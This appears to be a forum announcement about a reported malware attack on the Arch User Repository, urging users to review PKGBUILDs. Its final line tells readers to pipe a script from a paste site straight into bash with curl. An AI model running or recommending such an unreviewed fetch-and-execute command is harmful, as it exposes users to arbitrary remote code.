AUR Compromised - 400+ packages affected - 20260611 - Announcements - CachyOS Forum
As recently discussed on the Arch Mailing list there appears to have been a large coordinated attack on the AUR some time within the last 24 hours that seems to have resulted in a rather sizable amount of packages being contaminated with malware
This is a good reminder that the AUR is open, unofficial, user-produced, content.
The only secure way to use the Arch User Repository is by reviewing every PKGBUILD.
While efforts are now underway to clean out any problem packages there still exists the possibility that some users may have inadvertently downloaded some of these malicious sources.
Out of an abundance of caution I have duplicated efforts elsewhere to have a checkup script and will update it if and as more packages are found to be affected.
You can run it remotely using the following command;
curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
3 Likes